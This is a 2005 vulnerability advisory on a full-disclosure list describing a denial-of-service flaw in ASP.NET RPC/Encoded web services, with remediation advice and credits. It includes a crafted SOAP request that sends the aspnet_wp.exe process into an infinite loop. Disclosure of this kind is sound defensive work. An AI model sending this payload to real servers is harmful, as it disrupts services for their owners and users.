[Full-disclosure] ASP.NET RCP/Encoded Web service DOS

2005-07-12T00:00:00
ID SECURITYVULNS:DOC:9129
Type securityvulns
Reporter Securityvulns
Modified 2005-07-12T00:00:00

Description

ASP.NET RCP/Encoded Web service DOS http://www.spidynamics.com/spilabs/advisories/aspRCP.html

Release Date: July 11, 2005 Severity: High

[System Affected] * IIS Servers exposing ASP.NET Web services that consume arrays in RCP/Encoded mode * Applications using System.Xml.Serialization to consume untrusted data in RCP/Encoded mode

[Description] We have found that by sending a custom SOAP message to an RCP/Encoded web method which accepts an array (or any object derived from IList, like StringCollection or ArrayList), we can cause the aspnet_wp.exe process to consume 100% of the system resources. More than one request may be required to create this condition on faster systems.

To replicate the issue, we can send a request to the Test(int[] someList) web method defined inside the AspCrashWebService project (refer to AspCrashWebService.zip distributed with this document). A normal SOAP message to call this method with a single element of 0 would look like:

<?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <tns:Test> <someList href="#id1" /> </tns:Test> <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]"> <Item>0</Item> </soapenc:Array> </soap:Body> </soap:Envelope>

If we change the <soapenc:Array> definition with the complex type defined in our demo ASPCrashWebService.Service1 WSDL definition (ArrayOfInt), we will cause the problem in aspnet_wp.exe. Our new request would look like:

<?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <tns:Test> <someList href="#id1" /> </tns:Test> <tns:ArrayOfInt> <Item>0</Item> </tns:ArrayOfint> </soap:Body> </soap:Envelope>

We have found that the error is caused by an infinite loop inside System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElemen ts (). The method can be translated to the following code:

    protected void ReadReferencedElements&#40;&#41;
    {
        string V_0;

        r.MoveToContent&#40;&#41;;
        while &#40;r.NodeType != XmlNodeType.EndElement &amp;&amp; r.NodeType !=

XmlNodeType.None) { ReadReferencingElement(null, null, true, out V_0); r.MoveToContent(); } DoFixups(); HandleUnreferencedObjects(); }

The problem is that after the call to ReadRefencingElement() the r.NodeType is set to XmlNodeType.Element and the while loop never terminates.

[Remediation] RCP/Encoded web services are not recommended by Microsoft. Developers should utilize document/literal instead, which is not affected by this issue. The Microsoft Security Response Center has stated that this issue will be addressed in the upcoming "Whidbey" release of Web Services. In the interim, the aspnet_wp.exe service can be restarted and operation will resume without problems.

[Credit] Discovery: Bryan Sullivan Research: Sacha Faust

Contact Information spilabs@spidynamics.com SPI Dynamics, Inc. 115 Perimeter Center Place N.E. suite 1100 Atlanta, GA. 30346 Toll-Free Phone: (866) 774-2700

SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/